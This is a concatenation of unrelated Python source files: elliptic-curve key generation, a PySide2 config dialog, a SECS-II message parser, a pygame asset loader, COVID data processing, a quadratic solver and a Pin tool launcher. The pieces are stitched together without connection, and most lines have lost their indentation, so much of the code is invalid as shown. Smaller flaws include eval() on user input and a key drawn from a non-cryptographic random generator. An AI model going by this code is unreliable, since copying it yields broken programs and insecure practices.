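        # chord rule: lam = (y2 - y1) / (x2 - x1) mod p, x3 = lam^2 - x1 - x2, y3 = lam*(x1 - x3) - y1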
if A!=B:
C_x = (pow(B[1]-A[1],2,secp_p)*pow(intmath().mod_inv(B[0]-A[0],secp_p),2,secp_p) - A[0] - B[0]) % secp_p
C_y = ((B[1]-A[1])*intmath().mod_inv(B[0]-A[0],secp_p)*(A[0]-C_x) - A[1]) % secp_p
return [C_x, C_y]
# if A is equal to B then use this formula
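        # tangent rule: lam = (3*x1^2 + a) / (2*y1) mod p, x3 = lam^2 - 2*x1, y3 = lam*(x1 - x3) - y1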
if A==B:
C_x = (pow(3*pow(A[0],2,secp_p) + secp_a,2,secp_p)*pow(intmath().mod_inv(2*A[1],secp_p),2,secp_p) - 2*A[0]) % secp_p
            C_y = ((3*pow(A[0],2,secp_p) + secp_a)*intmath().mod_inv(2*A[1],secp_p)*(A[0] - C_x) - A[1]) % secp_p
return [C_x, C_y]
def point_mul(self, m, B):
if m == 0:
return secp_inf_point
if m == 1:
return B
if len(B)!=2:
raise Exception("public key must be an array of length 2!")
if type(m) != int or type(B[0]) != int:
raise Exception("EC curve point must be an array of integers!")
if m >= secp_n or m < 0:
raise Exception("Input parameter 1 outside the accepted range!")
if B[0] >= secp_n or B[0] < 0 or B[1] < 0 or B[1] >= secp_n:
raise Exception("Input parameter 2 outside the accepted range!")
m_bin_array = bin_array(m)
double_point = B
point_sum = secp_inf_point
for i in range(len(m_bin_array)):
if m_bin_array[len(m_bin_array)-i-1]==1:
point_sum = libsecp().point_add(double_point, point_sum)
            double_point = libsecp().point_add(double_point, double_point)  # double for the next bit (right-to-left double-and-add)
return point_sum
def key_store(num_keys):
    store = []
    for i in range(num_keys):
        privkey = libsecp().private_key()
        pubkey = libsecp().public_key(privkey)
        wallet_key = libsecp().wif(privkey)
        compressedkey = libsecp().compress_key(pubkey)
        store.append([wallet_key, pubkey, compressedkey])
    return store
def symmetric_key():
return random.randint(1, sym_key_n)
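# A minimal key-generation sketch (illustrative only; uses the classes defined above):
if __name__ == '__main__':
    demo_priv = libsecp().private_key()
    demo_pub = libsecp().public_key(demo_priv)
    print("WIF:       ", libsecp().wif(demo_priv))
    print("Public key:", libsecp().public_key_hex(demo_pub))
    print("Compressed:", libsecp().compress_key(demo_pub))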
|
names = []
with open("0022.txt") as file:
for line in file:
names_in_line = map(lambda s: s[1:-1], line.split(","))
names.extend(names_in_line)
names.sort()
def name_score(name, index):
score = 0
for char in name:
score += ord(char) - 64
score *= index
return score
total_name_score = 0
for index, name in enumerate(names):
total_name_score += name_score(name, index + 1)
print(total_name_score)
|
'''
Created on Jan 22, 2019
@author: sven
'''
from configparser import ConfigParser
from pathlib import Path
from PySide2.QtGui import QIntValidator
from PySide2.QtWidgets import QDialog, QApplication
from PySide2 import QtCore
from ui.configDialog import Ui_Dialog
class EcManConfigDialog(QDialog):
'''
QDialog based Configuration dialog for ECMan app
adapted from https://www.codementor.io/deepaksingh04/design-simple-dialog-using-pyqt5-designer-tool-ajskrd09n
and https://stackoverflow.com/questions/19379120/how-to-read-a-config-file-using-python#19379306
    class inherits from QDialog and contains the UI defined in Ui_Dialog (based on configDialog.ui)
'''
def __init__(self, parent=None, configFile=""):
'''
Constructor
'''
super(EcManConfigDialog, self).__init__(parent)
self.ui = Ui_Dialog()
self.ui.setupUi(self)
self.setWindowTitle("ECMan - Konfiguration")
self.ui.lineEdit_MaxFiles.setValidator(QIntValidator(10, 10000, self))
self.ui.lineEdit_MaxFileSize.setValidator(QIntValidator(10, 1000, self))
self.ui.comboBox_LbServer.addItem("")
self.ui.comboBox_LbServer.addItem("//NSSGSC01/LBV")
self.ui.comboBox_LbServer.addItem("//NSZHSC02/LBV")
self.ui.comboBox_LbServer.addItem("//NSBESC02/LBV")
self.config = ConfigParser()
self.configFile = configFile
if self.configFile == "":
self.configFile = Path(str(Path.home()) + "/.ecman.conf")
else:
self.configFile = Path(configFile)
if self.configFile.exists():
self.config.read_file(open(str(self.configFile)))
self.ui.comboBox_LbServer.setCurrentText(self.config.get("General", "lb_server", fallback=""))
self.ui.lineEdit_StdLogin.setText(self.config.get("Client", "lb_user", fallback="student"))
self.ui.lineEdit_winRmPort.setText(self.config.get("General", "winrm_port", fallback="5986"))
self.ui.lineEdit_OnlineWiki.setText(
self.config.get("General", "wikiurl", fallback="https://github.com/greenorca/ECMan/wiki"))
self.ui.lineEdit_winRmUser.setText(self.config.get("Client", "user", fallback="winrm"))
self.ui.lineEdit_winRmPwd.setText(self.config.get("Client", "pwd", fallback=""))
self.ui.lineEdit_MaxFiles.setText(self.config.get("Client", "max_files", fallback="1000"))
filesize = self.config.get("Client", "max_filesize", fallback="1000")
try:
filesize = int(filesize)
except Exception as ex:
filesize = 42
self.ui.lineEdit_MaxFileSize.setText(str(filesize))
self.ui.checkBox_advancedFeatures.setChecked(self.config.get("General","advanced_ui", fallback="False") == "True")
def saveConfig(self):
'''
saves entered configuration items
TODO: make bulletproof
'''
if not (self.configFile.exists()):
self.configFile.touch()
self.config.read_file(open(str(self.configFile)))
if not (self.config.has_section("General")):
self.config.add_section("General")
self.config["General"]["winrm_port"] = self.ui.lineEdit_winRmPort.text()
self.config["General"]["lb_server"] = self.ui.comboBox_LbServer.currentText()
onlineUrl = self.ui.lineEdit_OnlineWiki.text()
if not (onlineUrl.startswith("http://") or onlineUrl.startswith("https://")):
onlineUrl = "http://" + onlineUrl
self.config["General"]["wikiurl"] = onlineUrl
if not (self.config.has_section("Client")):
self.config.add_section("Client")
self.config["Client"]["lb_user"] = self.ui.lineEdit_StdLogin.text()
self.config["Client"]["user"] = self.ui.lineEdit_winRmUser.text()
self.config["Client"]["pwd"] = self.ui.lineEdit_winRmPwd.text()
maxfiles = self.ui.lineEdit_MaxFiles.text()
try:
maxfiles = int(maxfiles)
except Exception as ex:
maxfiles = 42
self.config["Client"]["max_files"] = str(maxfiles)
filesize = self.ui.lineEdit_MaxFileSize.text()
try:
filesize = int(filesize)
except:
filesize = 42
self.config["Client"]["max_filesize"] = str(filesize)
advancedUi = self.ui.checkBox_advancedFeatures.checkState() == QtCore.Qt.CheckState.Checked
self.config["General"]["advanced_ui"] = str(advancedUi)
self.config.write(open(self.configFile, 'w'))
if __name__ == "__main__":
'''
just for testing
'''
app = QApplication()
dlg = EcManConfigDialog(None, "dummy.conf")
result = dlg.exec_()
if result == 1:
dlg.saveConfig()
|
from .provider_base import *
from .motivato import *
|
# MIT License
# Copyright (c) 2017 MassChallenge, Inc.
from django.conf import settings
import swapper
from django.db.models import (
CASCADE,
ForeignKey,
)
from .accelerator_model import AcceleratorModel
class BasePartnerJudgeApplicationAssignment(AcceleratorModel):
judge = ForeignKey(settings.AUTH_USER_MODEL,
on_delete=CASCADE)
application = ForeignKey(
to=swapper.get_model_name(
AcceleratorModel.Meta.app_label, "Application"),
on_delete=CASCADE)
judging_round = ForeignKey(
to=swapper.get_model_name(
AcceleratorModel.Meta.app_label, "JudgingRound"),
on_delete=CASCADE)
partner = ForeignKey(
to=swapper.get_model_name(
AcceleratorModel.Meta.app_label, "Partner"),
on_delete=CASCADE)
class Meta(AcceleratorModel.Meta):
db_table = 'accelerator_partnerjudgeapplicationassignment'
abstract = True
|
import os
import struct
class Secs2BodyParseError(Exception):
pass
class Secs2BodySmlParseError(Secs2BodyParseError):
pass
class Secs2BodyBytesParseError(Secs2BodyParseError):
pass
class Secs2Body:
_ITEMS = (
('L', 0x00, -1, None),
('B', 0x20, 1, 'c'),
('BOOLEAN', 0x24, 1, '?'),
('A', 0x40, -1, None),
('I8', 0x60, 8, 'q'),
('I1', 0x64, 1, 'b'),
('I2', 0x68, 2, 'h'),
('I4', 0x70, 4, 'l'),
('F8', 0x80, 8, 'd'),
('F4', 0x90, 4, 'f'),
('U8', 0xA0, 8, 'Q'),
('U1', 0xA4, 1, 'B'),
('U2', 0xA8, 2, 'H'),
('U4', 0xB0, 4, 'L')
)
_BYTES_LEN_3 = 2**16
_BYTES_LEN_2 = 2**8
_SML_TAB = ' '
_SML_VALUESEPARATOR = ' '
_SML_LINESEPARATOR = os.linesep
def __init__(self, item_type, value):
if item_type is None:
raise TypeError("Not accept None")
tt = type(item_type)
if tt is str:
self._type = self._get_item_type_from_sml(item_type)
elif tt is tuple:
self._type = item_type
else:
raise TypeError("Require str or tuple")
def _tiof(value, item_size, is_signed): # test_int_overflow return int_value
if type(value) is str and value.upper().startswith("0X"):
v = int(value[2:], 16)
else:
v = int(value)
n = item_size * 8
if is_signed:
n -= 1
x = 2**n
max = x-1
if is_signed:
min = -x
else:
min = 0
if v > max or v < min:
raise ValueError("value is from " + str(min) + " to " + str(max) + ", value is " + str(v))
return v
tv = type(value)
if self._type[0] == 'L':
if tv is tuple or tv is list:
vv = list()
for x in value:
tx = type(x)
if tx is Secs2Body:
vv.append(x)
elif (tx is tuple or tx is list) and (len(x) == 2):
vv.append(Secs2Body(x[0], x[1]))
else:
raise TypeError("L value require tuple or list, and length == 2")
self._value = tuple(vv)
else:
raise TypeError("L values require tuple or list")
elif self._type[0] == 'BOOLEAN':
if tv is tuple or tv is list:
self._value = tuple([bool(x) for x in value])
else:
self._value = tuple([bool(value)])
elif self._type[0] == 'A':
self._value = str(value)
elif self._type[0] == 'B':
if tv is bytes:
self._value = value
elif tv is bytearray:
self._value = bytes(value)
elif tv is tuple or tv is list:
self._value = bytes([(_tiof(x, self._type[2], False)) for x in value])
else:
self._value = bytes([_tiof(value, self._type[2], False)])
elif self._type[0] in ('U1', 'U2', 'U4', 'U8'):
if tv is tuple or tv is list:
self._value = tuple([(_tiof(x, self._type[2], False)) for x in value])
else:
self._value = tuple([_tiof(value, self._type[2], False)])
elif self._type[0] in ('I1', 'I2', 'I4', 'I8'):
if tv is tuple or tv is list:
self._value = tuple([(_tiof(x, self._type[2], True)) for x in value])
else:
self._value = tuple((_tiof(value, self._type[2], True), ))
elif self._type[0] in ('F4', 'F8'):
if tv is tuple or tv is list:
self._value = tuple([float(x) for x in value])
else:
self._value = tuple((float(value), ))
self._cache_sml = None
self._cache_repr = None
self._cache_bytes = None
def __str__(self):
return self.to_sml()
def __repr__(self):
if self._cache_repr is None:
self._cache_repr = str((self._type[0], self._value))
return self._cache_repr
def __len__(self):
return len(self._value)
def __getitem__(self, item):
return self._value[item]
def __iter__(self):
return iter(self._value)
def __next__(self):
return next(self._value)
def get_type(self):
return self._type[0]
def to_sml(self):
def _ss(item_type, length, value): # create_sml_string
return '<' + item_type + ' [' + str(length) + '] ' + value + ' >'
def _lsf(value, level=''): # create_list_sml_string
deep_level = level + self._SML_TAB
vv = list()
vv.append(level + '<L [' + str(len(value)) + ']')
for x in value:
if x._type[0] == 'L':
vv.append(_lsf(x._value, deep_level))
else:
vv.append(deep_level + x.to_sml())
vv.append(level + '>')
return self._SML_LINESEPARATOR.join(vv)
if self._cache_sml is None:
if self._type[0] == 'L':
self._cache_sml = _lsf(self._value)
elif self._type[0] == 'BOOLEAN':
vv = [("TRUE" if x else "FALSE") for x in self._value]
self._cache_sml = _ss(
self._type[0],
len(vv),
self._SML_VALUESEPARATOR.join(vv))
elif self._type[0] == 'A':
self._cache_sml = _ss(
self._type[0],
len(self._value),
'"' + self._value + '"')
elif self._type[0] == 'B':
vv = [('0x' + '{:02X}'.format(x)) for x in self._value]
self._cache_sml = _ss(
self._type[0],
len(vv),
self._SML_VALUESEPARATOR.join(vv))
elif self._type[0] in ('I1', 'I2', 'I4', 'I8', 'U1', 'U2', 'U4', 'U8', 'F4', 'F8'):
vv = [str(x) for x in self._value]
self._cache_sml = _ss(
self._type[0],
len(vv),
self._SML_VALUESEPARATOR.join(vv))
return self._cache_sml
def to_bytes(self):
def _ihb(item_type_byte, value_length): # create_item_header_bytes
bs = struct.pack('>L', value_length)
if value_length >= self._BYTES_LEN_3:
return struct.pack('>B', (item_type_byte | 0x03)) + bs[1:4]
elif value_length >= self._BYTES_LEN_2:
return struct.pack('>B', (item_type_byte | 0x02)) + bs[2:4]
else:
return struct.pack('>B', (item_type_byte | 0x01)) + bs[3:4]
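        # Example (illustrative): a 5-element list header is the L format byte 0x00 OR'd with
        # 0x01 (one length byte) followed by 0x05, i.e. b'\x01\x05'.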
if self._cache_bytes is None:
if self._type[0] == 'L':
vv = [x.to_bytes() for x in self._value]
self._cache_bytes = _ihb(self._type[1], len(self._value)) + b''.join(vv)
elif self._type[0] == 'BOOLEAN':
vv = [(0xFF if f else 0x00) for f in self._value]
self._cache_bytes = _ihb(self._type[1], len(vv)) + bytes(vv)
elif self._type[0] == 'A':
bs = self._value.encode(encoding='ascii')
self._cache_bytes = _ihb(self._type[1], len(bs)) + bs
elif self._type[0] == 'B':
self._cache_bytes = _ihb(self._type[1], len(self._value)) + self._value
elif self._type[0] in ('I1', 'I2', 'I4', 'I8', 'F8', 'F4', 'U1', 'U2', 'U4', 'U8'):
bs = b''.join([struct.pack(('>' + self._type[3]), x) for x in self._value])
self._cache_bytes = _ihb(self._type[1], len(bs)) + bs
return self._cache_bytes
@classmethod
def _get_item_type_from_sml(cls, sml_item_type):
str_upper = sml_item_type.upper()
for i in cls._ITEMS:
if i[0] == str_upper:
return i
raise ValueError("'" + sml_item_type + "' not found")
@classmethod
def from_body_sml(cls, sml_str):
def _is_ws(v): # is_white_space
return (v.encode(encoding='ascii'))[0] <= 0x20
def _seek_next(s, from_pos, *args):
p = from_pos
if len(args) > 0:
while True:
v = s[p]
for a in args:
if type(a) is str:
if v == a:
return (v, p)
else:
if a(v):
return (v, p)
p += 1
else:
while True:
v = s[p]
if _is_ws(v):
p += 1
else:
return (v, p)
        def _ssbkt(s, from_pos):  # seek size_start_bracket '[' position, return position, -1 if not exist
            v, p = _seek_next(s, from_pos)
            return p if v == '[' else -1
        def _sebkt(s, from_pos):  # seek size_end_bracket ']' position, return position
            return (_seek_next(s, from_pos, ']'))[1]
        def _isbkt(s, from_pos):  # seek item_start_bracket '<' position, return position, -1 if not exist
            v, p = _seek_next(s, from_pos)
            return p if v == '<' else -1
        def _iebkt(s, from_pos):  # seek item_end_bracket '>' position, return position
            return (_seek_next(s, from_pos, '>'))[1]
def _seek_item(s, from_pos): # seek item_type, return (item_type, shifted_position)
p_start = (_seek_next(s, from_pos))[1]
p_end = (_seek_next(s, (p_start + 1), '[', '"', '<', '>', _is_ws))[1]
return (cls._get_item_type_from_sml(s[p_start:p_end]), p_end)
def _f(s, from_pos):
p = _isbkt(s, from_pos)
if p < 0:
raise Secs2BodySmlParseError("Not start < bracket")
tt, p = _seek_item(s, (p + 1))
r = _ssbkt(s, p)
if r >= 0:
p = _sebkt(s, (r + 1)) + 1
if tt[0] == 'L':
vv = list()
while True:
v, p = _seek_next(s, p)
if v == '>':
return (Secs2Body(tt, vv), (p + 1))
elif v == '<':
r, p = _f(s, p)
vv.append(r)
else:
raise Secs2BodySmlParseError("Not reach LIST end")
elif tt[0] == 'BOOLEAN':
r = _iebkt(s, p)
vv = list()
for x in s[p:r].strip().split():
ux = x.upper()
if ux == 'TRUE' or ux == 'T':
vv.append(True)
elif ux == 'FALSE' or ux == 'F':
vv.append(False)
else:
raise Secs2BodySmlParseError("Not accept, BOOELAN require TRUE or FALSE")
return (Secs2Body(tt, vv), (r + 1))
elif tt[0] == 'A':
vv = list()
while True:
v, p_start = _seek_next(s, p)
if v == '>':
return (Secs2Body(tt, ''.join(vv)), (p_start + 1))
elif v == '"':
v, p_end = _seek_next(s, (p_start + 1), '"')
vv.append(s[(p_start+1):p_end])
p = p_end + 1
elif v == '0':
if s[p_start + 1] not in ('X', 'x'):
raise Secs2BodyParseError("Ascii not accept 0xNN")
v, p = _seek_next(s, (p_start+2), '"', '>', _is_ws)
vv.append(bytes([int(s[(p_start+2):p], 16)]).decode(encoding='ascii'))
else:
raise Secs2BodySmlParseError("Ascii not reach end")
elif tt[0] in ('B', 'I1', 'I2', 'I4', 'I8', 'F4', 'F8', 'U1', 'U2', 'U4', 'U8'):
r = _iebkt(s, p)
return (Secs2Body(tt, s[p:r].strip().split()), (r + 1))
try:
if sml_str is None:
raise Secs2BodySmlParseError("Not accept None")
ss = str(sml_str).strip()
r, p = _f(ss, 0)
if len(ss[p:]) > 0:
raise Secs2BodySmlParseError("Not reach end, end=" + str(p) + ", length=" + str(len(ss)))
return r
except TypeError as e:
raise Secs2BodySmlParseError(str(e))
except ValueError as e:
raise Secs2BodySmlParseError(str(e))
except IndexError as e:
raise Secs2BodySmlParseError(str(e))
@classmethod
def from_body_bytes(cls, body_bytes):
def _itr(b): # get_item_type
x = b & 0xFC
for i in cls._ITEMS:
if i[1] == x:
return i
raise ValueError('0x' + '{:02X}'.format(b) + " not found")
        def _xr(bs, pos):  # get (item_type, value_length, shift_position)
            b = bs[pos]
            t = _itr(b)
            len_bit = b & 0x3
            if len_bit == 3:
                v_len = (bs[pos+1] << 16) | (bs[pos+2] << 8) | bs[pos+3]
            elif len_bit == 2:
                v_len = (bs[pos+1] << 8) | bs[pos+2]
            else:
                v_len = bs[pos+1]
            return (t, v_len, (len_bit + 1))
def _f(bs, pos):
            tt, v_len, b_len = _xr(bs, pos)
start_index = pos + b_len
end_index = pos + b_len + v_len
if tt[0] == 'L':
vv = list()
p = start_index
                for _ in range(v_len):
v, p = _f(bs, p)
vv.append(v)
return (Secs2Body(tt, vv), p)
elif tt[0] == 'BOOLEAN':
vv = [(b != 0x00) for b in bs[start_index:end_index]]
return (Secs2Body(tt, vv), end_index)
elif tt[0] == 'A':
v = bs[start_index:end_index].decode(encoding='ascii')
return (Secs2Body(tt, v), end_index)
elif tt[0] == 'B':
vv = bs[start_index:end_index]
return (Secs2Body(tt, vv), end_index)
elif tt[0] in ('I1', 'I2', 'I4', 'I8', 'F8', 'F4', 'U1', 'U2', 'U4', 'U8'):
vv = list()
p = start_index
for _ in range(0, v_len, tt[2]):
prev = p
p += tt[2]
v = struct.unpack(('>' + tt[3]), bs[prev:p])
vv.append(v[0])
return (Secs2Body(tt, vv), end_index)
try:
r, p = _f(body_bytes, 0)
length = len(body_bytes)
if p == length:
r._cache_bytes = bytes(body_bytes)
return r
else:
raise Secs2BodyBytesParseError("not reach bytes end, reach=" + str(p) + ", length=" + str(length))
except ValueError as e:
raise Secs2BodyBytesParseError(str(e))
except TypeError as e:
raise Secs2BodyBytesParseError(str(e))
except IndexError as e:
raise Secs2BodyBytesParseError(str(e))
if __name__ == '__main__':
print('')
print("try-python")
# s = Secs2Body({"aaa":111})
vv = tuple([
# Secs2Body('A', 'ASCII-VALUE'),
# Secs2Body('B', 1),
# Secs2Body('B', (0x01, 0x10, 0xAA, 0xFF)),
# Secs2Body('BOOLEAN', True),
# Secs2Body('BOOLEAN', (True, False, True)),
# Secs2Body('I1', 100),
# Secs2Body('I1', (100, -120)),
# Secs2Body('U4', 2000),
# Secs2Body('U2', (2000, 3000)),
# Secs2Body('F4', 10.0),
# Secs2Body('F4', (10.0, 20.0, -30.0)),
Secs2Body('L', (
('B', (0xFF, 0x01)),
('B', []),
('A', 'CCC_DDD'),
('I2', [100, -200, -300]),
('U4', [100, 200, 300]),
('L', [
('BOOLEAN', True),
('U4', 12345)
]),
('L', [])
))
])
# for v in vv:
# print(v)
# print(repr(v))
# a = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
# v = Secs2Body('A', a+a+a+a+a+a+a+a+a+a)
# v = Secs2Body('B', [0x00, 0xFF, 0x1, 0x2])
# v = Secs2Body('BOOLEAN', (True, False))
# v = Secs2Body('U2', (1, 2, 3))
# v = Secs2Body('I2', (-1, 2, -3))
# v = Secs2Body('F8', (10.0, 20.0))
v = Secs2Body('L', [
('L', [
('B', [0x01, 0xFF]),
('BOOLEAN', [True, False]),
('L', [])
]),
('B', [0x01, 0x10]),
('A', "ABCDEF"),
('U2', [1,2,3]),
('I2', [-100,200,-300]),
('F4', [19.00, -29.00])
])
bs = v.to_bytes()
print(bs)
r = Secs2Body.from_body_bytes(bs)
print(r)
x = Secs2Body.from_body_sml(r.to_sml())
print(x)
print(x.to_bytes())
# print('length: ' + str(len(x)))
# for a in x:
# print(a.get_type() + ': ' + str(a._value))
# for b in a:
# print(b)
# print(x[0][1][1])
# v = Secs2Body.from_body_sml('<A [10] "XYZ123" 0x61 0x20 "ABC">')
# v = Secs2Body.from_body_sml('<BOOLEAN[2] TRUE FALSE>')
# v = Secs2Body.from_body_sml('<B 0x0A 0x02>')
# v = Secs2Body.from_body_sml('<U2 100 200>')
# v = Secs2Body.from_body_sml('<L <A "AAA" 0x42\t0x43"124" ><L <I1 1><I2 100>><B 0x0><BOOLEAN TRUE><F4 -10.0>>')
# print(v)
# try:
# bs = v.to_bytes()
# print(bs)
# r = Secs2Body.from_body_bytes(bs)
# print(r)
# except Secs2BodyParseError as e:
# print("Secs2BodyParserError: " + str(e))
|
import os
import re
import pygame as p
class AssetLoader():
"""
Scan asset folders and import images
"""
ASSETSPATH = './Assets/'
PNGEXT = '.png'
_instance = None
def __new__(cls):
if cls._instance is None:
cls._instance = super(AssetLoader, cls).__new__(cls)
if os.path.exists(AssetLoader.ASSETSPATH):
cls._instance.files = os.listdir(AssetLoader.ASSETSPATH)
else:
raise OSError('unable to find ' + AssetLoader.ASSETSPATH)
return cls._instance
def __load_sprites(self, file_filter):
player_sprites = []
regex = re.compile(file_filter)
filtered_files = list(filter(regex.search, self.files))
if len(filtered_files) > 1:
number_regex = re.compile(r'(\d+)')
filtered_files = sorted(
filtered_files,
key=lambda x: int(number_regex.search(x)[0])
)
for file in filtered_files:
file_relpath = self.ASSETSPATH + file
try:
player_sprites.append(p.image.load(file_relpath))
except p.error as message:
print('cannot load image:', file_relpath)
raise SystemExit(message)
return player_sprites
def load_walk_left_sprites(self):
return self.__load_sprites('L[0-9].png')
def load_walk_right_sprites(self):
return self.__load_sprites('R[0-9].png')
def load_background(self):
return self.__load_sprites('bg.jpg').pop()
def load_character(self):
return self.__load_sprites('standing.png')
def load_enemy_walk_left_sprites(self):
return self.__load_sprites('L[0-9]{1,2}E.png')
def load_enemy_walk_right_sprites(self):
return self.__load_sprites('R[0-9]{1,2}E.png')
def load_bullet_sound(self):
return p.mixer.Sound(self.ASSETSPATH + 'bullet.mp3')
def load_hit_sound(self):
return p.mixer.Sound(self.ASSETSPATH + 'hit.mp3')
def load_music(self):
return p.mixer.Sound(self.ASSETSPATH + 'music.mp3')
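# A minimal usage sketch (illustrative only; assumes pygame is initialised and ./Assets/ contains
# the expected sprite files):
#     loader = AssetLoader()
#     assert loader is AssetLoader()  # singleton: __new__ always returns the same instance
#     background = loader.load_background()
#     walk_left = loader.load_walk_left_sprites()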
|
import os.path
from . import *
class TestFilesWithSpaces(IntegrationTest):
def __init__(self, *args, **kwargs):
super().__init__('files_with_spaces', *args, **kwargs)
def test_build(self):
self.build(executable('quad damage'))
self.assertOutput([executable('quad damage')], 'QUAD DAMAGE!\n')
def test_build_sub_dir(self):
self.build(executable('another file'))
self.assertOutput([executable('another file')], 'hello from sub dir\n')
@only_if_backend('make', hide=True)
def test_dir_sentinels(self):
self.build(executable('another file'))
self.assertTrue(os.path.isfile('another file.int/sub dir/.dir'))
@skip_if_backend('msbuild')
def test_script(self):
self.assertRegex(self.build('script'), '(?m)^hello, world!$')
|
import json
from werkzeug.datastructures import FileStorage
from esdlvalidator.core.esdl import utils
from esdlvalidator.core.exceptions import UnknownESDLFileType
from esdlvalidator.validation.abstract_repository import SchemaRepository
from esdlvalidator.validation.validator import Validator
class ValidationService:
"""Service for handling all requests to the validation endpoint"""
def __init__(self, schemaRepository: SchemaRepository):
self.__repo = schemaRepository
self.__validator = Validator()
self.esdl = None
def validate(self, file: FileStorage, schemaIds: list, validateXsd: bool):
"""Validate an uploaded file against the given schemas
Args:
file (FileStorage): Uploaded file
schemaIds: List of schema id's to validate against. example [1,2]
Returns:
result: JSON result of the validation
Raises:
SchemaNotFound: One of the validation schemas was not found
UnknownESDLFileType: Type of uploaded file is not supported
InvalidESDL: ESDL could not be loaded by the system
"""
if not self.__allowed_file(file.filename):
raise UnknownESDLFileType
schemas = self.__repo.get_by_ids(schemaIds)
esdlString = self.__get_esdl_string(file)
result = self.__validator.validate(esdlString, schemas, validateXsd)
# ToDo: fix need for toJSON and then back
jsonString = result.toJSON()
return json.loads(jsonString)
def validateContents(self, esdlContents: str, schemaIds: list, validateXsd: bool):
"""Validate an uploaded file contents against the given schemas
Args:
esdlContents (String): Uploaded file contents
schemaIds: List of schema id's to validate against. example [1,2]
Returns:
result: JSON result of the validation
Raises:
SchemaNotFound: One of the validation schemas was not found
UnknownESDLFileType: Type of uploaded file is not supported
"""
schemas = self.__repo.get_by_ids(schemaIds)
result = self.__validator.validate(esdlContents, schemas, validateXsd)
# ToDo: fix need for toJSON and then back
jsonString = result.toJSON()
return json.loads(jsonString)
def __allowed_file(self, filename):
"""Allowed esdl file extensions"""
return "." in filename and \
filename.rsplit(".", 1)[1].lower() in ["esdl", "xml"]
def __get_esdl_string(self, file):
"""Get a string from the uploaded file"""
fileBytes = file.read()
esdlString = fileBytes.decode("utf-8")
return esdlString
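# A minimal usage sketch (illustrative only; SomeSchemaRepository and esdl_xml_string are
# hypothetical placeholders for a concrete SchemaRepository implementation and an ESDL document):
#     repo = SomeSchemaRepository()
#     service = ValidationService(repo)
#     result = service.validateContents(esdl_xml_string, schemaIds=[1, 2], validateXsd=True)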
|
import pandas as pd
abbreviations = ['DE', 'DE-BW', 'DE-BY', 'DE-HB', 'DE-HH', 'DE-HE',
'DE-NI', 'DE-NW', 'DE-RP', 'DE-SL', 'DE-SH', 'DE-BB',
'DE-MV', 'DE-SN', 'DE-ST', 'DE-TH', 'DE-BE']
regions = ['Bundesgebiet', 'Baden-Württemberg', 'Bayern', 'Bremen', 'Hamburg', 'Hessen',
'Niedersachsen', 'Nordrhein-Westfalen', 'Rheinland-Pfalz', 'Saarland', 'Schleswig-Holstein', 'Brandenburg',
'Mecklenburg-Vorpommern', 'Sachsen', 'Sachsen-Anhalt', 'Thüringen', 'Berlin']
# dictionary to map region names to abbreviations
region_dict = dict(zip(regions, abbreviations))
# get current date
date = pd.to_datetime('today').date()
url = "https://raw.githubusercontent.com/robert-koch-institut/COVID-19-Hospitalisierungen_in_Deutschland/master/" \
f"Archiv/{date}_Deutschland_adjustierte-COVID-19-Hospitalisierungen.csv"
# import the csv file as a dataframe
df = pd.read_csv(url, sep=',', parse_dates=["Datum"])
# drop the most recent two dates and dates older than 28 days
df = df[df.Datum.dt.date.between(date - pd.Timedelta(days = 28), date - pd.Timedelta(days = 2), inclusive = 'left')]
# rename locations according to submission guidelines
df.Bundesland.replace(region_dict, inplace = True)
# drop unnecessary columns
df.drop(columns = ["Bundesland_Id","Altersgruppe","Bevoelkerung","fixierte_7T_Hospitalisierung_Faelle",
"aktualisierte_7T_Hospitalisierung_Faelle","fixierte_7T_Hospitalisierung_Inzidenz",
"aktualisierte_7T_Hospitalisierung_Inzidenz","PS_adjustierte_7T_Hospitalisierung_Inzidenz",
"UG_PI_adjustierte_7T_Hospitalisierung_Inzidenz","OG_PI_adjustierte_7T_Hospitalisierung_Inzidenz"],
inplace = True)
df.rename(columns = {'Datum': 'target_end_date', 'Bundesland': 'location'}, inplace = True)
# rearrange in long format
df = pd.melt(df, id_vars = ['target_end_date', 'location'], var_name = 'quantile')
# recode the values of the 'quantile' column
df['quantile'].replace({'PS_adjustierte_7T_Hospitalisierung_Faelle': '',
'UG_PI_adjustierte_7T_Hospitalisierung_Faelle': '0.025',
'OG_PI_adjustierte_7T_Hospitalisierung_Faelle': '0.975'},
inplace = True)
# add column 'type'
df['type'] = 'quantile'
df.loc[df['quantile'] == '', 'type'] = 'mean'
# add necessary columns
df["age_group"] = "00+"
df["forecast_date"] = date
df["pathogen"] = "COVID-19"
# calculate the values of the "target" column
df["forecast_date"] = pd.to_datetime(df["forecast_date"])
df["target"] = (df['target_end_date'] - df['forecast_date']).dt.days
df["target"] = df["target"].astype(str) + " day ahead inc hosp"
# sort the columns
df = df[["location","age_group", "forecast_date", "target_end_date", "target", "type","quantile", "value", "pathogen"]]
# export to csv
df.to_csv(f"./data-processed/RKI-weekly_report/{date}-RKI-weekly_report.csv", index = False)
|
from math import sqrt
a,b,c=eval(input('please input float a,b,c'))
if a==0:
    print('Error: a must not be 0')
else:
delta=b**2-4*a*c
if delta>=0:
x1=(-b-sqrt(delta))/(2*a)
x2=(-b+sqrt(delta))/(2*a)
else:
        # complex conjugate roots; parentheses around 2*a are required in the imaginary part
        x1=complex((-b)/(2*a),-(sqrt(-delta))/(2*a))
        x2=complex((-b)/(2*a),(sqrt(-delta))/(2*a))
print('{:10.5f},{:10.5f}'.format(x1,x2))
|
#-*- coding: utf-8 -*-
from confiture import Confiture, ConfigFileError
import os
from src.py.sym import SymExtractor
from src.py.log import Log, default_log_path, default_log_dir
from src.py.pintool import Pintool
from src.py.res import Result
def launch_analysis(args, analysis=None):
if analysis is None:
analysis = args.analysis
# Read configuration file
tpl = Confiture("config/template.yaml")
config = tpl.check_and_get("config/config.yaml")
# Check if temporary repo exists
if not os.path.exists("tmp"):
os.makedirs("tmp")
# Extract dwarf info
SymExtractor().extract(args.pgm, "tmp/dwarf.txt")
# Create Pintool object
pintool = Pintool(
config["pin"]["path"],
config["pin"]["bin"],
config["pin"]["compile-flags"],
config["pintool"]["src"],
config["pintool"]["obj"],
)
# Log file
if args.log:
        logdir = args.log
else:
logdir = default_log_dir(args.pgm)
# Compile pintool
Log.stdout("compiling pintool")
if not pintool.compile(analysis if analysis else args.analysis):
Log.stdout("compilation exited with non-zero status")
exit()
if "oracle" in analysis:
infile = "tmp/dwarf.txt"
else:
infile = None
# Launch pintool
Log.stdout("launching analysis on {}".format(args.pgm))
